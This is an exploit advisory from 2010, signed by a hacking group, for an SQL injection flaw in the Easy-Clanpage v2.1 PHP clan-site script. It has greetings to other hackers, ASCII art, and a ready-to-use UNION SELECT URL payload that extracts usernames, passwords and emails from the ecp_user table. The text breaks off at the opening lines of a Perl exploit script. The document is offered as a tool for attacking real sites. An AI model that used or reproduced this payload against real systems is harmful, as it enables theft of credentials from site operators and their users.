1 /*−−−−−−−−−−−−−−−−−−−−−−−−−−−−Information−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 +Name : Easy−Clanpage <= v2.1 SQL Injection Exploit
3 +Author : Easy Laster
4 +Date : 30.03.2010
5 +Script Easy−Clanpage <= v2.1
6 +Download : Update Version 2.01−>2.1 http://www.easy−clanpage.de
7 /?section=downloads&action=viewdl&id=16
8 +Price : for free
9 +Language : PHP
10 +Discovered by Easy Laster
11 +Security Group 4004−Security−Project
12 +Greetz to Team−Internet ,Underground Agents
13 +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
14 Kiba,−tmh−,Dr Chaos,HANN!BAL,Kabel,−=Player=−,Lidloses_Auge,
15 N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.
16 */
17 /*−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
18
19 ___ ___ ___ ___ _ _ _____ _ _
20 | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
21 |_ | | | | |_ |___|_ −| −_| _| | | _| | _| | |___| __| _| . | | | −_| _| _|
22 |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
23 |___| |___|
24
25
26 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
27 +Vulnerability : http://www.site.com/Easy−Clanpage/?section=gallery&action=kate&id=
28
29
30 #SQL Injection
31 +Exploitable : http://www.site.com/Easy−Clanpage/?section=gallery&action=kate&id=1
32 +union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+ecp_user
33 +where+userid=1−−
34 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
35
36 +Exploit
37 */
38
39 #!usr\bin\perl
40 #
41 #
42 ##################################################
43 # Modules #
44 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#
45 use strict;